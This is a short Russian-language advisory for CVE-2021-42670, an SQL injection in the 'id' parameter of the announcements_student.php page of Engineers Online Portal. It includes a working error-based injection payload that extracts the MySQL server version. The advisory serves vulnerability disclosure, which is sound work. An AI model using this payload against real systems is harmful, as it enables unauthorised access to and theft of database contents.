
CVE-2021-42670 - Уязвимость SQL-инъекции в системе онлайн-портала инженеров.
CVE-2021-42670 - SQL-инъекция в системе онлайн-портала инженеров.
Уязвимость SQL-инъекции существует в Engineers Online Portal. Злоумышленник может использовать уязвимый параметр "id" на веб-странице "announcements_student.php" для манипуляции выполняемым SQL-запросом. В результате злоумышленник может извлечь конфиденциальные данные с веб-сервера.
Затронутые компоненты -
Уязвимая страница - announcements_student.php
Уязвимый параметр - "id"
Следующий payload позволит вам извлечь версию MySql сервера, работающего на веб-сервере -
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

Алон Левиев (0xDeku), 22 октября 2021 года.